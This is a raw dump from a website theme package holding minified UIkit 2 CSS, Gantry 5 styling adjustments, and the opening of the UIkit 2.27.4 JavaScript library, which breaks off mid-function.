(min-width:768px){.uk-align-medium-left{margin-right:15px;float:left}.uk-align-medium-right{margin-left:15px;float:right}}.uk-align-center{margin-left:auto;margin-right:auto}.uk-vertical-align{font-size:0}.uk-vertical-align:before{content:'';display:inline-block;height:100%;vertical-align:middle}.uk-vertical-align-bottom,.uk-vertical-align-middle{display:inline-block;max-width:100%;font-size:1rem}.uk-vertical-align-middle{vertical-align:middle}.uk-vertical-align-bottom{vertical-align:bottom}.uk-height-1-1{height:100%}.uk-height-viewport{height:100vh;min-height:600px}.uk-responsive-width{max-width:100%!important;height:auto}.uk-responsive-height{max-height:100%;width:auto}.uk-margin{margin-bottom:15px}*+.uk-margin{margin-top:15px}.uk-margin-top{margin-top:15px!important}.uk-margin-bottom{margin-bottom:15px!important}.uk-margin-left{margin-left:15px!important}.uk-margin-right{margin-right:15px!important}.uk-margin-large{margin-bottom:50px}*+.uk-margin-large{margin-top:50px}.uk-margin-large-top{margin-top:50px!important}.uk-margin-large-bottom{margin-bottom:50px!important}.uk-margin-large-left{margin-left:50px!important}.uk-margin-large-right{margin-right:50px!important}.uk-margin-small{margin-bottom:5px}*+.uk-margin-small{margin-top:5px}.uk-margin-small-top{margin-top:5px!important}.uk-margin-small-bottom{margin-bottom:5px!important}.uk-margin-small-left{margin-left:5px!important}.uk-margin-small-right{margin-right:5px!important}.uk-margin-remove{margin:0!important}.uk-margin-top-remove{margin-top:0!important}.uk-margin-bottom-remove{margin-bottom:0!important}.uk-overflow-container>:last-child,.uk-scrollable-box>:last-child{margin-bottom:0}.uk-padding-remove{padding:0!important}.uk-padding-top-remove{padding-top:0!important}.uk-padding-bottom-remove{padding-bottom:0!important}.uk-padding-vertical-remove{padding-top:0!important;padding-bottom:0!important}.uk-border-circle{border-radius:50%}.uk-border-rounded{border-radius:5px}.uk-heading-large{font-size:36px;line-height:42px}.uk-link-muted,.uk-link-muted a,.uk-link-muted a:hover,.uk-link-muted:hover{color:#444}.uk-link-reset,.uk-link-reset a,.uk-link-reset a:focus,.uk-link-reset a:hover,.uk-link-reset:focus,.uk-link-reset:hover{color:inherit;text-decoration:none}.uk-scrollable-text{height:300px;overflow-y:scroll;-webkit-overflow-scrolling:touch;resize:both}.uk-scrollable-box{height:170px;padding:10px;border:1px solid #ddd;overflow:auto;-webkit-overflow-scrolling:touch;resize:both;border-radius:3px}.uk-overflow-hidden{overflow:hidden}.uk-overflow-container{overflow:auto;-webkit-overflow-scrolling:touch}.uk-position-absolute,[class*=uk-position-top],[class*=uk-position-bottom]{position:absolute!important}.uk-position-top{top:0;left:0;right:0}.uk-position-bottom{bottom:0;left:0;right:0}.uk-position-top-left{top:0;left:0}.uk-position-top-right{top:0;right:0}.uk-position-bottom-left{bottom:0;left:0}.uk-position-bottom-right{bottom:0;right:0}.uk-position-cover{position:absolute;top:0;bottom:0;left:0;right:0}.uk-position-relative{position:relative!important}.uk-position-z-index{z-index:1}.uk-display-block{display:block!important}.uk-display-inline{display:inline!important}.uk-display-inline-block{display:inline-block!important;max-width:100%}@media (min-width:960px){.uk-hidden-large,.uk-visible-medium,.uk-visible-small{display:none!important}}@media (min-width:768px) and (max-width:959px){.uk-hidden-medium,.uk-visible-large,.uk-visible-small{display:none!important}}@media (max-width:767px){.uk-text-center-small{text-align:center!important}.uk-text-left-small{text-align:left!important}.uk-hidden-small,.uk-visible-large,.uk-visible-medium{display:none!important}}.uk-hidden{display:none!important}.uk-visible-hover:hover .uk-hidden,.uk-visible-hover:hover .uk-invisible{display:block!important;visibility:visible!important}.uk-visible-hover-inline:hover .uk-hidden,.uk-visible-hover-inline:hover .uk-invisible{display:inline-block!important;visibility:visible!important}.uk-notouch .uk-hidden-notouch,.uk-touch .uk-hidden-touch{display:none!important}.uk-flex{display:-ms-flexbox;display:-webkit-flex;display:flex}.uk-flex-inline{display:-ms-inline-flexbox;display:-webkit-inline-flex;display:inline-flex}.uk-flex-inline>*,.uk-flex>*{-ms-flex-negative:1}.uk-flex-top{-ms-flex-align:start;-webkit-align-items:flex-start;align-items:flex-start}.uk-flex-middle{-ms-flex-align:center;-webkit-align-items:center;align-items:center}.uk-flex-bottom{-ms-flex-align:end;-webkit-align-items:flex-end;align-items:flex-end}.uk-flex-center{-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center}.uk-flex-right{-ms-flex-pack:end;-webkit-justify-content:flex-end;justify-content:flex-end}.uk-flex-space-between{-ms-flex-pack:justify;-webkit-justify-content:space-between;justify-content:space-between}.uk-flex-space-around{-ms-flex-pack:distribute;-webkit-justify-content:space-around;justify-content:space-around}.uk-flex-row-reverse{-ms-flex-direction:row-reverse;-webkit-flex-direction:row-reverse;flex-direction:row-reverse}.uk-flex-column{-ms-flex-direction:column;-webkit-flex-direction:column;flex-direction:column}.uk-flex-column-reverse{-ms-flex-direction:column-reverse;-webkit-flex-direction:column-reverse;flex-direction:column-reverse}.uk-flex-nowrap{-ms-flex-wrap:nowrap;-webkit-flex-wrap:nowrap;flex-wrap:nowrap}.uk-flex-wrap{-ms-flex-wrap:wrap;-webkit-flex-wrap:wrap;flex-wrap:wrap}.uk-flex-wrap-reverse{-ms-flex-wrap:wrap-reverse;-webkit-flex-wrap:wrap-reverse;flex-wrap:wrap-reverse}.uk-flex-wrap-top{-ms-flex-line-pack:start;-webkit-align-content:flex-start;align-content:flex-start}.uk-flex-wrap-middle{-ms-flex-line-pack:center;-webkit-align-content:center;align-content:center}.uk-flex-wrap-bottom{-ms-flex-line-pack:end;-webkit-align-content:flex-end;align-content:flex-end}.uk-flex-wrap-space-between{-ms-flex-line-pack:justify;-webkit-align-content:space-between;align-content:space-between}.uk-flex-wrap-space-around{-ms-flex-line-pack:distribute;-webkit-align-content:space-around;align-content:space-around}.uk-flex-order-first{-ms-flex-order:-1;-webkit-order:-1;order:-1}.uk-flex-order-last{-ms-flex-order:99;-webkit-order:99;order:99}@media (min-width:480px){.uk-flex-order-first-small{-ms-flex-order:-1;-webkit-order:-1;order:-1}.uk-flex-order-last-small{-ms-flex-order:99;-webkit-order:99;order:99}}@media (min-width:768px){.uk-heading-large{font-size:52px;line-height:64px}.uk-flex-order-first-medium{-ms-flex-order:-1;-webkit-order:-1;order:-1}.uk-flex-order-last-medium{-ms-flex-order:99;-webkit-order:99;order:99}}@media (min-width:960px){.uk-flex-order-first-large{-ms-flex-order:-1;-webkit-order:-1;order:-1}.uk-flex-order-last-large{-ms-flex-order:99;-webkit-order:99;order:99}}@media (min-width:1220px){.uk-flex-order-first-xlarge{-ms-flex-order:-1;-webkit-order:-1;order:-1}.uk-flex-order-last-xlarge{-ms-flex-order:99;-webkit-order:99;order:99}}.uk-flex-item-none{-ms-flex:none;-webkit-flex:none;flex:none}.uk-flex-item-auto{-ms-flex:auto;-webkit-flex:auto;flex:auto;-ms-flex-negative:1}.uk-flex-item-1{-ms-flex:1;-webkit-flex:1;flex:1}

/*! Accordion */
.uk-accordion-title{margin-top:0;margin-bottom:15px;padding:5px 15px;background:#f5f5f5;font-size:18px;line-height:24px;cursor:pointer;border:1px solid #ddd;border-radius:4px}.uk-accordion-content{padding:0 15px 15px 15px}.uk-accordion-content:after,.uk-accordion-content:before{content:"";display:table}.uk-accordion-content:after{clear:both}.uk-accordion-content>:last-child{margin-bottom:0}

/*! Notify */
.uk-notify{position:fixed;top:10px;left:10px;z-index:1040;box-sizing:border-box;width:350px}.uk-notify-bottom-right,.uk-notify-top-right{left:auto;right:10px}.uk-notify-bottom-center,.uk-notify-top-center{left:50%;margin-left:-175px}.uk-notify-bottom-center,.uk-notify-bottom-left,.uk-notify-bottom-right{top:auto;bottom:10px}@media (max-width:479px){.uk-notify{left:10px;right:10px;width:auto;margin:0}}.uk-notify-message{position:relative;margin-bottom:10px;padding:15px;background:#444;color:#fff;font-size:16px;line-height:22px;cursor:pointer;border:1px solid #444;border-radius:4px}.uk-notify-message>.uk-close{visibility:hidden;float:right}.uk-notify-message:hover>.uk-close{visibility:visible}.uk-notify-message-primary{background:#ebf7fd;color:#2d7091;border-color:rgba(45,112,145,.3)}.uk-notify-message-success{background:#f2fae3;color:#659f13;border-color:rgba(101,159,19,.3)}.uk-notify-message-warning{background:#fffceb;color:#e28327;border-color:rgba(226,131,39,.3)}.uk-notify-message-danger{background:#fff1f0;color:#d85030;border-color:rgba(216,80,48,.3)}

/*! Dotnav */
.uk-dotnav{display:-ms-flexbox;display:-webkit-flex;display:flex;-ms-flex-wrap:wrap;-webkit-flex-wrap:wrap;flex-wrap:wrap;margin-left:-15px;margin-top:-15px;padding:0;list-style:none}.uk-dotnav>*{-ms-flex:none;-webkit-flex:none;flex:none;padding-left:15px;margin-top:15px}.uk-dotnav:after,.uk-dotnav:before{content:"";display:block;overflow:hidden}.uk-dotnav:after{clear:both}.uk-dotnav>*{float:left}.uk-dotnav>*>*{display:block;box-sizing:content-box;width:20px;height:20px;border-radius:50%;background:rgba(50,50,50,.1);text-indent:100%;overflow:hidden;white-space:nowrap;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.uk-dotnav>*>:focus,.uk-dotnav>*>:hover{background:rgba(50,50,50,.4);outline:0}.uk-dotnav>*>:active{background:rgba(50,50,50,.6)}.uk-dotnav>.uk-active>*{background:rgba(50,50,50,.4);-webkit-transform:scale(1.3);transform:scale(1.3)}.uk-dotnav-contrast>*>*{background:rgba(255,255,255,.4)}.uk-dotnav-contrast>*>:focus,.uk-dotnav-contrast>*>:hover{background:rgba(255,255,255,.7)}.uk-dotnav-contrast>*>:active{background:rgba(255,255,255,.9)}.uk-dotnav-contrast>.uk-active>*{background:rgba(255,255,255,.9)}.uk-dotnav-vertical{-ms-flex-direction:column;-webkit-flex-direction:column;flex-direction:column}.uk-dotnav-vertical>*{float:none}

/*! Progress */
.uk-progress{box-sizing:border-box;height:20px;margin-bottom:15px;background:#f5f5f5;overflow:hidden;line-height:20px;box-shadow:inset 0 0 0 1px rgba(0,0,0,.06);border-radius:4px}*+.uk-progress{margin-top:15px}.uk-progress-bar{width:0;height:100%;background:#00a8e6;float:left;-webkit-transition:width .6s ease;transition:width .6s ease;font-size:12px;color:#fff;text-align:center;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-progress-mini{height:6px}.uk-progress-small{height:12px}.uk-progress-success .uk-progress-bar{background-color:#8cc14c}.uk-progress-warning .uk-progress-bar{background-color:#faa732}.uk-progress-danger .uk-progress-bar{background-color:#da314b}.uk-progress-striped .uk-progress-bar{background-image:-webkit-linear-gradient(-45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(-45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-size:30px 30px}.uk-progress-striped.uk-active .uk-progress-bar{-webkit-animation:uk-progress-bar-stripes 2s linear infinite;animation:uk-progress-bar-stripes 2s linear infinite}@-webkit-keyframes uk-progress-bar-stripes{0%{background-position:0 0}100%{background-position:30px 0}}@keyframes uk-progress-bar-stripes{0%{background-position:0 0}100%{background-position:30px 0}}.uk-progress-mini,.uk-progress-small{border-radius:500px}

/*! Slidenav */
.uk-slidenav{display:inline-block;box-sizing:border-box;width:60px;height:60px;line-height:60px;color:rgba(50,50,50,.4);font-size:60px;text-align:center}.uk-slidenav:focus,.uk-slidenav:hover{outline:0;text-decoration:none;color:rgba(50,50,50,.7);cursor:pointer}.uk-slidenav:active{color:rgba(50,50,50,.9)}.uk-slidenav-previous:before{content:"\f104";font-family:FontAwesome}.uk-slidenav-next:before{content:"\f105";font-family:FontAwesome}.uk-slidenav-position{position:relative}.uk-slidenav-position .uk-slidenav{display:none;position:absolute;top:50%;z-index:1;margin-top:-30px}.uk-slidenav-position:hover .uk-slidenav{display:block}.uk-slidenav-position .uk-slidenav-previous{left:20px}.uk-slidenav-position .uk-slidenav-next{right:20px}.uk-slidenav-contrast{color:rgba(255,255,255,.5)}.uk-slidenav-contrast:focus,.uk-slidenav-contrast:hover{color:rgba(255,255,255,.7)}.uk-slidenav-contrast:active{color:rgba(255,255,255,.9)}

/*! Slider */
[data-uk-slider]{direction:ltr}html[dir=rtl] .uk-slider>*{direction:rtl}.uk-slider{position:relative;z-index:0;touch-action:pan-y}.uk-slider:not(.uk-grid){margin:0;padding:0;list-style:none}.uk-slider>*{position:absolute;top:0;left:0}.uk-slider-container{overflow:hidden}.uk-slider:not(.uk-drag){-webkit-transition:-webkit-transform .2s linear;transition:transform .2s linear}.uk-slider.uk-drag{cursor:col-resize;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;user-select:none}.uk-slider a,.uk-slider img{-webkit-user-drag:none;user-drag:none;-webkit-touch-callout:none}.uk-slider img{pointer-events:none}.uk-slider-fullscreen,.uk-slider-fullscreen>li{height:100vh}

/*! Slideshow */
.uk-slideshow{position:relative;z-index:0;width:100%;margin:0;padding:0;list-style:none;overflow:hidden;touch-action:pan-y}.uk-slideshow>li{position:absolute;top:0;left:0;width:100%;opacity:0}.uk-slideshow>.uk-active{z-index:10;opacity:1}.uk-slideshow>li>img{visibility:hidden}[data-uk-slideshow-slide]{cursor:pointer}.uk-slideshow-fullscreen,.uk-slideshow-fullscreen>li{height:100vh}.uk-slideshow-fade-in{-webkit-animation:uk-fade .5s linear;animation:uk-fade .5s linear}.uk-slideshow-fade-out{-webkit-animation:uk-fade .5s linear reverse;animation:uk-fade .5s linear reverse}.uk-slideshow-scroll-forward-in{-webkit-animation:uk-slide-right .5s ease-in-out;animation:uk-slide-right .5s ease-in-out}.uk-slideshow-scroll-forward-out{-webkit-animation:uk-slide-left .5s ease-in-out reverse;animation:uk-slide-left .5s ease-in-out reverse}.uk-slideshow-scroll-backward-in{-webkit-animation:uk-slide-left .5s ease-in-out;animation:uk-slide-left .5s ease-in-out}.uk-slideshow-scroll-backward-out{-webkit-animation:uk-slide-right .5s ease-in-out reverse;animation:uk-slide-right .5s ease-in-out reverse}.uk-slideshow-scale-out{-webkit-animation:uk-fade-scale-15 .5s ease-in-out reverse;animation:uk-fade-scale-15 .5s ease-in-out reverse}.uk-slideshow-swipe-forward-in{-webkit-animation:uk-slide-left-33 .5s ease-in-out;animation:uk-slide-left-33 .5s ease-in-out}.uk-slideshow-swipe-forward-out{-webkit-animation:uk-slide-left .5s ease-in-out reverse;animation:uk-slide-left .5s ease-in-out reverse}.uk-slideshow-swipe-backward-in{-webkit-animation:uk-slide-right-33 .5s ease-in-out;animation:uk-slide-right-33 .5s ease-in-out}.uk-slideshow-swipe-backward-out{-webkit-animation:uk-slide-right .5s ease-in-out reverse;animation:uk-slide-right .5s ease-in-out reverse}.uk-slideshow-swipe-backward-in:before,.uk-slideshow-swipe-forward-in:before{content:'';position:absolute;top:0;bottom:0;left:0;right:0;z-index:1;background:rgba(0,0,0,.6);-webkit-animation:uk-fade .5s ease-in-out reverse;animation:uk-fade .5s ease-in-out reverse}

/*! Sticky */
[data-uk-sticky].uk-active{z-index:980;box-sizing:border-box;-webkit-backface-visibility:hidden}[data-uk-sticky][class*=uk-animation-]{-webkit-animation-duration:.2s;animation-duration:.2s}[data-uk-sticky].uk-animation-reverse{-webkit-animation-duration:.2s;animation-duration:.2s}

/*! Tooltip */
.uk-tooltip{display:none;position:absolute;z-index:1030;box-sizing:border-box;max-width:200px;padding:5px 8px;background:#333;color:rgba(255,255,255,.7);font-size:12px;line-height:18px;border-radius:3px;text-shadow:0 1px 0 rgba(0,0,0,.5)}.uk-tooltip:after{content:"";display:block;position:absolute;width:0;height:0;border:5px dashed #333}.uk-tooltip-top-left:after,.uk-tooltip-top-right:after,.uk-tooltip-top:after{bottom:-5px;border-top-style:solid;border-bottom:none;border-left-color:transparent;border-right-color:transparent;border-top-color:#333}.uk-tooltip-bottom-left:after,.uk-tooltip-bottom-right:after,.uk-tooltip-bottom:after{top:-5px;border-bottom-style:solid;border-top:none;border-left-color:transparent;border-right-color:transparent;border-bottom-color:#333}.uk-tooltip-bottom:after,.uk-tooltip-top:after{left:50%;margin-left:-5px}.uk-tooltip-bottom-left:after,.uk-tooltip-top-left:after{left:10px}.uk-tooltip-bottom-right:after,.uk-tooltip-top-right:after{right:10px}.uk-tooltip-left:after{right:-5px;top:50%;margin-top:-5px;border-left-style:solid;border-right:none;border-top-color:transparent;border-bottom-color:transparent;border-left-color:#333}.uk-tooltip-right:after{left:-5px;top:50%;margin-top:-5px;border-right-style:solid;border-left:none;border-top-color:transparent;border-bottom-color:transparent;border-right-color:#333}

/*! Adjustments for Gantry 5 and InspireTheme.com */
/*! Lightbox hover magnifier icon size */
.uk-overlay-area:empty::before, .uk-overlay-icon::before {
	font-size: 30px;
	height: 30px;
	width: 30px;
	margin-left: -15px;
	margin-top: -15px;
}

/*! UIkit grid gutter modification */
@media (min-width: 1220px) {
	.uk-grid {
		margin-left: -30px;
	}
	.uk-grid > * {
		padding-left: 30px;
	}
}

/*! UIkit Tooltip Styling */
.uk-tooltip {
	background: rgba(0, 0, 0, 0.8);
	color: #ffffff;
	border-radius: 4px;
}

.uk-tooltip-top-left::after, .uk-tooltip-top-right::after, .uk-tooltip-top::after {
	border-color: rgba(0, 0, 0, 0.8) transparent;
}

/*! UIkit Modal */
.uk-modal-dialog {
	border-radius: 4px;
}

/*! UIkit Dotnav and Slidenav */
.uk-dotnav {
	margin: 0;
	margin-top: 40px;
	margin-left: -15px;
}

.uk-dotnav > * {
	margin-top: 0;
}

.uk-dotnav > * > * {
	cursor: pointer;
}

.uk-dotnav > .uk-active > * {
	-webkit-transform: none;
	-moz-transform: none;
	-ms-transform: none;
	-o-transform: none;
	transform: none;
}

.uk-slidenav {
	color: #fff;
	display: inline-block;
	font-size: 20px;
	font-weight: bold;
	background: #000;
	background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
	border-radius: 5px;
	cursor: pointer;
	height: 35px;
	width: 35px;
	line-height: 35px;
	margin-right: 0;
	margin-top: 2px;
}

.uk-slidenav:hover {
	color: #fff;
	background: #000;
}

.uk-slidenav:focus, .uk-slidenav:active {
	color: #fff;
}

.uk-slidenav-position .uk-slidenav {
	margin-top: -17.5px;
	opacity: 0;
	display: block;
	-webkit-transition: opacity 0.3s, background 0.2s;
	-moz-transition: opacity 0.3s, background 0.2s;
	transition: opacity 0.3s, background 0.2s;
}

.uk-slidenav-position:hover .uk-slidenav {
	opacity: 1;
}

/*! UIkit overlay styling */
.uk-overlay-panel a:not([class]) {
	text-decoration: none;
}

.uk-overlay-panel h1, .uk-overlay-panel h2, .uk-overlay-panel h3, .uk-overlay-panel h4, .uk-overlay-panel h5, .uk-overlay-panel h6 {
	color: #fff !important;
	margin-bottom: 0;
}

.uk-overlay-panel .g-content-pro-title a {
	color: #fff;
}

/* Particle Title and Introtext */
.g-particle-intro {
	margin-bottom: 3rem;
	text-align: center;
}

.g-particle-intro .g-particle-intro {
	margin-bottom: 3rem;
}

.g-particle-intro .g-main-title {
	margin-bottom: 0;
}

.g-particle-intro .g-title-separator {
	height: 2px;
	width: 100px;
	margin: 20px auto;
	background: #e3e9eb;
}

.g-particle-intro .g-title-separator.no-intro-text {
	margin: 2.5rem auto 0;
}

.g-particle-intro .g-introtext {
	width: 75%;
	margin: 0 auto;
}PK!-%������ it_sanctum/uikit/js/uikit.min.jsnu&1i�/*! UIkit 2.27.4 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
!function(t){var i;if(!window.jQuery)throw new Error("UIkit 2.x requires jQuery");i=t(window.jQuery),"function"==typeof define&&define.amd&&define("uikit",function(){return i.load=function(t,e,n,o){var s,a=t.split(","),r=[],l=(o.config&&o.config.uikit&&o.config.uikit.base?o.config.uikit.base:"").replace(/\/+$/g,"");if(!l)throw new Error("Please define base path to UIkit in the requirejs config.");for(s=0;s<a.length;s+=1){var c=a[s].replace(/\./g,"/");r.push(l+"/components/"+c)}e(r,function(){n(i)})},i})}(function(t){"use strict";if(window.UIkit2)return window.UIkit2;var i={},e=window.UIkit||void 0;if(i.version="2.27.4",i.noConflict=function(){return e&&(window.UIkit=e,t.UIkit=e,t.fn.uk=e.fn),i},window.UIkit2=i,e||(window.UIkit=i),i.$=t,i.$doc=i.$(document),i.$win=i.$(window),i.$html=i.$("html"),i.support={},i.support.transition=function(){var t=function(){var t,i=document.body||document.documentElement,e={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(t in e)if(void 0!==i.style[t])return e[t]}();return t&&{end:t}}(),i.support.animation=function(){var t=function(){var t,i=document.body||document.documentElement,e={WebkitAnimation:"webkitAnimationEnd",MozAnimation:"animationend",OAnimation:"oAnimationEnd oanimationend",animation:"animationend"};for(t in e)if(void 0!==i.style[t])return e[t]}();return t&&{end:t}}(),function(){Date.now=Date.now||function(){return(new Date).getTime()};for(var t=["webkit","moz"],i=0;i<t.length&&!window.requestAnimationFrame;++i){var e=t[i];window.requestAnimationFrame=window[e+"RequestAnimationFrame"],window.cancelAnimationFrame=window[e+"CancelAnimationFrame"]||window[e+"CancelRequestAnimationFrame"]}if(/iP(ad|hone|od).*OS 6/.test(window.navigator.userAgent)||!window.requestAnimationFrame||!window.cancelAnimationFrame){var n=0;window.requestAnimationFrame=function(t){var i=Date.now(),e=Math.max(n+16,i);return setTimeout(function(){t(n=e)},e-i)},window.cancelAnimationFrame=clearTimeout}}(),i.support.touch="ontouchstart"in document||window.DocumentTouch&&document instanceof window.DocumentTouch||window.navigator.msPointerEnabled&&window.navigator.msMaxTouchPoints>0||window.navigator.pointerEnabled&&window.navigator.maxTouchPoints>0||!1,i.support.mutationobserver=window.MutationObserver||window.WebKitMutationObserver||null,i.Utils={},i.Utils.isFullscreen=function(){return document.webkitFullscreenElement||document.mozFullScreenElement||document.msFullscreenElement||document.fullscreenElement||!1},i.Utils.str2json=function(t,i){try{return i?JSON.parse(t.replace(/([\$\w]+)\s*:/g,function(t,i){return'"'+i+'":'}).replace(/'([^']+)'/g,function(t,i){return'"'+i+'"'})):new Function("","var json = "+t+"; return JSON.parse(JSON.stringify(json));")()}catch(e){return!1}},i.Utils.debounce=function(t,i,e){var n;return function(){var o=this,s=arguments,a=function(){n=null,e||t.apply(o,s)},r=e&&!n;clearTimeout(n),n=setTimeout(a,i),r&&t.apply(o,s)}},i.Utils.throttle=function(t,i){var e=!1;return function(){e||(t.call(),e=!0,setTimeout(function(){e=!1},i))}},i.Utils.removeCssRules=function(t){var i,e,n,o,s,a,r,l,c,u;t&&setTimeout(function(){try{for(u=document.styleSheets,o=0,r=u.length;r>o;o++){for(n=u[o],e=[],n.cssRules=n.cssRules,i=s=0,l=n.cssRules.length;l>s;i=++s)n.cssRules[i].type===CSSRule.STYLE_RULE&&t.test(n.cssRules[i].selectorText)&&e.unshift(i);for(a=0,c=e.length;c>a;a++)n.deleteRule(e[a])}}catch(d){}},0)},i.Utils.isInView=function(e,n){var o=t(e);if(!o.is(":visible"))return!1;var s=i.$win.scrollLeft(),a=i.$win.scrollTop(),r=o.offset(),l=r.left,c=r.top;return n=t.extend({topoffset:0,leftoffset:0},n),c+o.height()>=a&&c-n.topoffset<=a+i.$win.height()&&l+o.width()>=s&&l-n.leftoffset<=s+i.$win.width()?!0:!1},i.Utils.checkDisplay=function(e,n){var o=i.$("[data-uk-margin], [data-uk-grid-match], [data-uk-grid-margin], [data-uk-check-display]",e||document);return e&&!o.length&&(o=t(e)),o.trigger("display.uk.check"),n&&("string"!=typeof n&&(n='[class*="uk-animation-"]'),o.find(n).each(function(){var t=i.$(this),e=t.attr("class"),n=e.match(/uk-animation-(.+)/);t.removeClass(n[0]).width(),t.addClass(n[0])})),o},i.Utils.options=function(e){if("string"!=t.type(e))return e;-1!=e.indexOf(":")&&"}"!=e.trim().substr(-1)&&(e="{"+e+"}");var n=e?e.indexOf("{"):-1,o={};if(-1!=n)try{o=i.Utils.str2json(e.substr(n))}catch(s){}return o},i.Utils.animate=function(e,n){var o=t.Deferred();return e=i.$(e),e.css("display","none").addClass(n).one(i.support.animation.end,function(){e.removeClass(n),o.resolve()}),e.css("display",""),o.promise()},i.Utils.uid=function(t){return(t||"id")+(new Date).getTime()+"RAND"+Math.ceil(1e5*Math.random())},i.Utils.template=function(t,i){for(var e,n,o,s,a=t.replace(/\n/g,"\\n").replace(/\{\{\{\s*(.+?)\s*\}\}\}/g,"{{!$1}}").split(/(\{\{\s*(.+?)\s*\}\})/g),r=0,l=[],c=0;r<a.length;){if(e=a[r],e.match(/\{\{\s*(.+?)\s*\}\}/))switch(r+=1,e=a[r],n=e[0],o=e.substring(e.match(/^(\^|\#|\!|\~|\:)/)?1:0),n){case"~":l.push("for(var $i=0;$i<"+o+".length;$i++) { var $item = "+o+"[$i];"),c++;break;case":":l.push("for(var $key in "+o+") { var $val = "+o+"[$key];"),c++;break;case"#":l.push("if("+o+") {"),c++;break;case"^":l.push("if(!"+o+") {"),c++;break;case"/":l.push("}"),c--;break;case"!":l.push("__ret.push("+o+");");break;default:l.push("__ret.push(escape("+o+"));")}else l.push("__ret.push('"+e.replace(/\'/g,"\\'")+"');");r+=1}return s=new Function("$data",["var __ret = [];","try {","with($data){",c?'__ret = ["Not all blocks are closed correctly."]':l.join(""),"};","}catch(e){__ret = [e.message];}",'return __ret.join("").replace(/\\n\\n/g, "\\n");',"function escape(html) { return String(html).replace(/&/g, '&amp;').replace(/\"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');}"].join("\n")),i?s(i):s},i.Utils.focus=function(i,e){if(i=t(i),!i.length)return i;var n,o=i.find("[autofocus]:first");return o.length?o.focus():(o=i.find(":input"+(e&&","+e||"")).first(),o.length?o.focus():(i.attr("tabindex")||(n=1e3,i.attr("tabindex",n)),i[0].focus(),n&&i.attr("tabindex",""),i))},i.Utils.events={},i.Utils.events.click=i.support.touch?"tap":"click",i.fn=function(e,n){var o=arguments,s=e.match(/^([a-z\-]+)(?:\.([a-z]+))?/i),a=s[1],r=s[2];return i[a]?this.each(function(){var e=t(this),s=e.data(a);s||e.data(a,s=i[a](this,r?void 0:n)),r&&s[r].apply(s,Array.prototype.slice.call(o,1))}):(t.error("UIkit component ["+a+"] does not exist."),this)},t.UIkit=i,t.fn.uk=i.fn,i.langdirection="rtl"==i.$html.attr("dir")?"right":"left",i.components={},i.component=function(e,n,o){if(i.components[e]&&!o)return i.components[e];var s=function(n,o){var a=this;return this.UIkit=i,this.element=n?i.$(n):null,this.options=t.extend(!0,{},this.defaults,o),this.plugins={},this.element&&this.element.data(e,this),this.init(),(this.options.plugins.length?this.options.plugins:Object.keys(s.plugins)).forEach(function(t){s.plugins[t].init&&(s.plugins[t].init(a),a.plugins[t]=!0)}),this.trigger("init.uk.component",[e,this]),this};return s.plugins={},t.extend(!0,s.prototype,{defaults:{plugins:[]},boot:function(){},init:function(){},on:function(t,e,n){return i.$(this.element||this).on(t,e,n)},one:function(t,e,n){return i.$(this.element||this).one(t,e,n)},off:function(t){return i.$(this.element||this).off(t)},trigger:function(t,e){return i.$(this.element||this).trigger(t,e)},find:function(t){return i.$(this.element?this.element:[]).find(t)},proxy:function(t,i){var e=this;i.split(" ").forEach(function(i){e[i]||(e[i]=function(){return t[i].apply(t,arguments)})})},mixin:function(t,i){var e=this;i.split(" ").forEach(function(i){e[i]||(e[i]=t[i].bind(e))})},option:function(){return 1==arguments.length?this.options[arguments[0]]||void 0:(2==arguments.length&&(this.options[arguments[0]]=arguments[1]),void 0)}},n),this.components[e]=s,this[e]=function(){var n,o;if(arguments.length)switch(arguments.length){case 1:"string"==typeof arguments[0]||arguments[0].nodeType||arguments[0]instanceof jQuery?n=t(arguments[0]):o=arguments[0];break;case 2:n=t(arguments[0]),o=arguments[1]}return n&&n.data(e)?n.data(e):new i.components[e](n,o)},i.domready&&i.component.boot(e),s},i.plugin=function(t,i,e){this.components[t].plugins[i]=e},i.component.boot=function(t){i.components[t].prototype&&i.components[t].prototype.boot&&!i.components[t].booted&&(i.components[t].prototype.boot.apply(i,[]),i.components[t].booted=!0)},i.component.bootComponents=function(){for(var t in i.components)i.component.boot(t)},i.domObservers=[],i.domready=!1,i.ready=function(t){i.domObservers.push(t),i.domready&&t(document)},i.on=function(t,e,n){return t&&t.indexOf("ready.uk.dom")>-1&&i.domready&&e.apply(i.$doc),i.$doc.on(t,e,n)},i.one=function(t,e,n){return t&&t.indexOf("ready.uk.dom")>-1&&i.domready?(e.apply(i.$doc),i.$doc):i.$doc.one(t,e,n)},i.trigger=function(t,e){return i.$doc.trigger(t,e)},i.domObserve=function(t,e){i.support.mutationobserver&&(e=e||function(){},i.$(t).each(function(){var t=this,n=i.$(t);if(!n.data("observer"))try{var o=new i.support.mutationobserver(i.Utils.debounce(function(){e.apply(t,[n]),n.trigger("changed.uk.dom")},50),{childList:!0,subtree:!0});o.observe(t,{childList:!0,subtree:!0}),n.data("observer",o)}catch(s){}}))},i.init=function(t){t=t||document,i.domObservers.forEach(function(i){i(t)})},i.on("domready.uk.dom",function(){i.init(),i.domready&&i.Utils.checkDisplay()}),document.addEventListener("DOMContentLoaded",function(){var e=function(){i.$body=i.$("body"),i.trigger("beforeready.uk.dom"),i.component.bootComponents();var e=requestAnimationFrame(function(){var t={dir:{x:0,y:0},x:window.pageXOffset,y:window.pageYOffset},n=function(){var 